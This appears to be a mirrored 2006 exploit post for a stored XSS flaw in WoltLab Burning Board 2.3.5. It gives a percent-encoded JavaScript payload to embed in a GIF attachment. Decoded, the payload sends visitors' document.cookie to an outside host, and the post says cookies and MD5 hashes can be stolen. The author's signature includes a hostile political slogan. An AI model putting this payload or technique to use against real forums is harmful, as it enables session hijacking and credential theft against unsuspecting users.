WoltLab Burning Board 2.3.5(WBB) in XSS

2006-08-2100:00:00

vulners.com

115

JSON

################################################

WBB in XSS We aren't able to bite from the Avatar ,But attachment.php With xss code are able to bite.

################################################

HEX editor With GIF picture Open , JS code are writing.

Js Code:Hex:
&#37;3c&#37;73&#37;63&#37;72&#37;69&#37;70&#37;74&#37;3e&#37;69&#37;6d&#37;67&#37;20&#37;3d&#37;20&#37;6e&#37;65&#37;77&#37;20&#37;49&#37;6d&#37;61&#37;67&#37;65&#37;28&#37;29&#37;3b&#37;20&#37;69&#37;6d&#37;67&#37;2e&#37;73&#37;72&#37;63&#37;20&#37;3d&#37;20&#37;22&#37;68&#37;74&#37;74&#37;70&#37;3a&#37;2f&#37;2f&#37;77&#37;77&#37;77&#37;2e&#37;6c&#37;61&#37;73&#37;74&#37;66&#37;6f&#37;72&#37;63&#37;65&#37;2e&#37;63&#37;6f&#37;6d&#37;2f&#37;5a&#37;2f&#37;73&#37;2e&#37;70&#37;68&#37;70&#37;3f&#37;22&#37;2b&#37;64&#37;6f&#37;63&#37;75&#37;6d&#37;65&#37;6e&#37;74&#37;2e&#37;63&#37;6f&#37;6f&#37;6b&#37;69&#37;65&#37;3b&#37;3c&#37;2f&#37;73&#37;63&#37;72&#37;69&#37;70&#37;74&#37;3e
#################################################

We are joining official to the page,but Attachment do.and attachment taking the address.

~
http://Site/WBB/attachment.php?attachmentid=ID

Cookies , MD5 able to take

######################################

ZeberuS || Redworm

[email protected] || [email protected]

Kahrolsun Pkk Aq

Now War Israel ! Stop War !

JSON

WoltLab Burning Board 2.3.5&#40;WBB&#41; in XSS

WoltLab Burning Board 2.3.5(WBB) in XSS